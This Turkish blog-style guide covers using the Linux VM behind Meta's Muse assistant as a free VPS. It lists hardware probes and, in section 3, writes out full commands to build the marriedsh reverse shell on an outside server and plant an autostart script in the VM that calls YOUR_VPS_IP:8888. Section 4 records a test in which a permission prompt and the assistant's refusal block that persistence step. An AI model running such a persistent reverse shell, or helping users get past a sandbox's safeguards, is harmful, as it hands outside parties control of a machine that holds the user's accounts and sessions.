Muse, her hesaba bağımsız bir Linux sanal makinesi atıyor. Birçok kişi bana şunu soruyor: Bu ücretsiz bulut bilgisayarı gerçek bir bulut sunucusu (VPS) olarak kullanabilir miyim? İnternette dolaşan reverse shell tünelleme eğitimleri gerçekten işe yarıyor mu?
Muse üzerinde yerel CDP otomasyon araçlarını kullanarak uçtan uca gerçek cihaz testi yaptım. Donanım keşfi, ağ izinlerinin açılması, reverse shell'lerin fiilen engellenmesi ve bu ortamın uyumlu bir bulut sunucusu olarak script çalıştırmak için nasıl kullanılacağı süreçlerinin tamamını kaydettim; ardından bu pratik rehberi ve "tuzaklardan kaçınma" kılavuzunu kaleme aldım.
1. Gerçek Cihaz Testi: 2 Çekirdek, 8G RAM ve 100G Diskin Kutudan Çıktığı Gibi Doğrulanması
Birçok kişi Muse'un sadece geçici bir sohbet sandbox'ı olduğunu sanır. Ancak terminalde yerel sistem tespit komutlarını çalıştırdığınızda, bu ana makinenin gerçek fiziksel parametrelerini net bir şekilde görebilirsiniz.
Terminale şu komutları yazdım:
1nproc2free -h3df -h4uname -a5whoami && pwd
Gerçek terminal çıktı verileri:
- CPU Özellikleri: 2 çekirdek (x86_64)
- Bellek Kapasitesi: Toplam kapasite 7.7 GiB, sistemin temel kullanımı yaklaşık 5.3 GiB, kullanılabilir bellek yaklaşık 2.5 GiB
- Disk Bağlantıları (Mount): Kök bölüme 7.5 GiB ayrılmışken, /home/hatch kullanıcı ana dizini altında ayrı bir 100 GiB kalıcı disk (/dev/mapper/rv) bağlı durumda
- İşletim Sistemi: Ubuntu 24.04.5 LTS (Noble Numbat), çekirdek sürümü 7.0.0-generic
- Çalıştırma İzinleri: Varsayılan olarak /home/hatch dizininde root yetkisiyle çalışıyor

Testlerim şunu ortaya koydu: Kayıt olan her kullanıcı gerçekten de 2 çekirdek / 8G / 100G Linux donanımlı, eksiksiz ve bağımsız bir ortama sahip oluyor.
2. Temel Geliştirme Araç Zinciri ve Giden Ağ Keşfi
Bu makinede kendi arka plan araçlarınızı çalıştırmak için, sisteme entegre geliştirme araçlarını ve ağ kısıtlamalarını iyi anlamanız gerekir.
Terminalimde yaptığım detaylı keşif sonuçları:
- Önceden Yüklü Araçlar: Sistem varsayılan olarak git 2.43.0 ve curl 8.5.0 sürümleriyle geliyor; temel ağ ve veri çekme araçları hazır.
- Geliştirme Ortamı: Rust (rustc) önceden yüklü değil. Rust projelerini derlemeniz gerekiyorsa resmi scriptler üzerinden kurulum yapmalı veya doğrudan önceden derlenmiş binary dosyaları kullanmalısınız.
- Giden Ağ Durumu:
curl -Is https://github.comtesti HTTP 200 döndürüyor; giden trafik dahili güvenlik proxy'si üzerinden normal şekilde geçiyor. - Kalıcı Yeniden Başlatma Dizini: Sistemle yapılan testlerde,
/home/hatchaltında oluşturulan/home/hatch/pdatadizininin yeniden başlatmaların ardından verileri koruduğu doğrulandı. Burası özel binary araçlarını ve iş verilerini depolamak için ideal.

3. Eğitici Demo: Önerilen Ters Tünelleme Çözümü Nasıl Yapılandırılır?
Neden bazı insanlar ters bağlantılar (reverse connection) kurmak istiyor? Çünkü Muse bir bulut iç ağ sandbox'ında çalışır ve dışarıdaki genel ağlar bu sanal makineye IP üzerinden doğrudan erişemez.
Yaygın bir tünelleme mantığı şudur: Ters proxy aracı (marriedsh gibi) kullanarak Muse'un dışarıdaki genel bir VPS'e aktif olarak bağlanmasını sağlamak, ardından VPS üzerinden terminal Shell'ini ele geçirmek.
Bu çözümün standart yapılandırma adımları şöyledir:
1. Dış Genel VPS Hazırlığı
Genel IP'si olan bağımsız bir VPS üzerinde sunucu tarafını derleyip dağıtın:
1# 1. marriedsh'i klonlayın ve derleyin2git clone https://github.com/swigger/marriedsh.git3cd marriedsh && cargo build --release4sudo cp target/release/marriedsh /usr/local/bin/56# 2. Sunucu kimlik doğrulamasını yapılandırın ~/.config/marriedsh/config.toml7mkdir -p ~/.config/marriedsh8cat << 'EOF' > ~/.config/marriedsh/config.toml9[server]10bind = "0.0.0.0:8888"11password = "your_secure_password"12credential = "clark"13EOF
2. Muse İstemcisi Otomatik Başlatma Scriptini Yazma
Muse terminalinde, önyükleme veya görev etkinleştirildiğinde VPS'e otomatik olarak bir ters kanal kurması için /home/hatch/init.sh otomatik başlatma scriptini yapılandırın:
1mkdir -p /home/hatch/pdata/bin23cat << 'EOF' > /home/hatch/init.sh4#!/bin/bash5# Başlangıçta Muse VM arka plan ters daemon'u6/home/hatch/pdata/bin/marriedsh join --lock /run/msh.lock -p your_secure_password --credential clark YOUR_VPS_IP:8888 > /home/hatch/pdata/msh.log 2>&1 &7EOF89chmod +x /home/hatch/init.sh
3. VPS Konsolu Üzerinden Kontrolü Ele Geçirme
Bağlantı kurulduktan sonra, uzak bir Shell elde etmek için VPS tarafında şu komutu çalıştırın:
1marriedsh console -n clark
4. Gerçek Cihaz Pratiği: Reverse Shell Zorlamak Neden Güvenlik Engelini Tetikliyor?
Yukarıdaki adımları gerçek cihaz terminalinde bizzat çalıştırdım. Test sonuçları iki kritik gerçeği ortaya koydu:
1. Sentinel Tek Komutluk İzolasyon Kapısı
Muse'dan git clone https://github.com/swigger/marriedsh.git komutunu çalıştırmasını istediğimde, Sentinel mekanizması anında bir engelleme penceresi çıkardı:
Muse'un github.com ile bilgi paylaşmasına izin verilsin mi? [Bir kez izin ver] [Bu siteye her zaman izin ver] [Reddet]
Testlerle doğrulandı: Kullanıcı açıkça "İzin Ver" butonuna tıklamadan önce, bilinmeyen dış alan adlarıyla iletişim kurmaya çalışan herhangi bir işlem sistem tarafından askıya alınıyor.

2. Reverse Shell'ler İçin Otomatik Semantik Risk Kontrolü ve Reddetme Mekanizması
İzinler onaylanıp kod başarıyla /home/hatch/workspace/marriedsh dizinine klonlandıktan sonra, sistem otomatik başlatma kalıcılık scriptini yazmaya hazırlanırken Muse'un temel hizalama modeli aktif olarak bir güvenlik engellemesi gerçekleştirdi ve net bir ret açıklaması yaptı:
"Bu sefer çalıştırmayacağım. İki noktayı netleştirelim: Birincisi, az önce onaylanan şey yalnızca
git clonekomutuydu, otomatik başlatma scripti yazmak değildi—onay başka adımlara devredilemez. İkincisi,marriedshbir reverse shell'dir: kurulup otomatik başlatmaya ayarlandığında, dışarıdaki bir sunucu bu VM üzerinde rastgele komutlar çalıştırabilir. Ve bu makinenin hafıza dosyalarınıza, bağlı hesaplarınıza ve tarayıcı oturumlarınıza erişimi var. Hedef IP ve parola sadece yer tutucu olduğundan, bunu derlemeyecek veya çalıştırmayacağım."

Testlerim kanıtlıyor: Reverse shell zorlamak çıkmaz bir sokaktır. Sadece güvenlik modeli tarafından engellenmekle kalmaz, aynı zamanda anormal uzun süreli dış bağlantılar nedeniyle risk kontrolü yasaklarını da tetikler.
5. Asıl Büyük Ders: Bu Makineyi Tünel Olmadan Uyumlu Bir VPS Olarak Nasıl Kullanırsınız?
Birçok kişinin düşüncesi "Sunucu demek için mutlaka bir SSH istemcisiyle bağlanman gerekir" kalıbına sıkışmış durumda.
Testlerime göre, bu sanal makineyi VPS olarak kullanmanın doğru yolu onu "Her Koşula Dayanıklı Veri İşleme ve Otomasyon Merkezi" haline getirmektir:
- Sohbet Kutusuna Süper Terminal Muamelesi Yapın:
Ayrı bir siyah ekran terminali açmanıza gerek yok. Komutları doğrudan oturum içinde verebilirsiniz; sistem arka planda root yetkisiyle Python çağırarak scriptleri çalıştırır, verileri işler ve dönüşümleri gerçekleştirir.
- `/home/hatch/pdata` Kullanarak Kalıcı Bir Bulut Sürücüsü Oluşturun:
Tüm kodlarınızı, Python scriptlerinizi ve temizleme sonuçlarınızı pdata dizinine koyun. Testlerimde, bu 100G diskteki dosyaların başka bir cihazdan giriş yapıldığında veya sistem yeniden başlatıldığında bile bozulmadan kaldığını doğruladım.
- Zamanlanmış Görevlerle 24 Saat Kesintisiz Daemon Çalıştırın:
"Web sayfası kapanınca güç kesiliyor" sorununu çözün: Resmi olarak desteklenen zamanlanmış görev planları sayesinde, sistemin her gün sabit saatlerde otomatik uyanmasını, arka planda toplu işlemler çalıştırmasını ve denetim günlükleri (audit.log) yazmasını sağlayabilirsiniz.
- Artifacts Kullanarak Görsel Paneller (Dashboard) Üretin:
Normal bir VPS scriptleri çalıştırdıktan sonra size sadece log gösterebilir, ancak Muse verileri doğrudan etkileşimli Web App ön yüz panellerine dönüştürebilir.

6. Özet ve Tuzaklardan Kaçınmanın Altın Kuralları
- Donanım Bonusu Gerçek: Testlerim, Meta'nın her kullanıcıya gerçekten de 2 çekirdek / 8G / 100G SSD'lik bağımsız bir ortam sağladığını gösterdi; hesaplama temeli son derece sağlam.
- Reverse Shell'lerden Vazgeçin: Ters proxy tuzağına düşmeyin; bunlar işe yaramaz ve kolayca risk kontrolü yasaklarını tetikler.
- Uyumluluk Verimliliktir: Kendi her koşulda çalışan veri işleme hattınızı sıfır maliyetle kurmak için
/home/hatch/pdatakalıcı depolama alanını ve Zamanlanmış Görev (Scheduled Task) zamanlamasını akıllıca kullanın.
Büyük şirketler büyük şirket olmaya devam ediyor. Bunu standart bir VPS olarak kullanmanız pek olası olmasa da, oynayabileceğiniz daha birçok farklı yol var... Gelecek bölümdeki testimiz: Kurulum gerektirmeyen kalıcı dizinler, Python veri temizleme scriptleri yazmak...





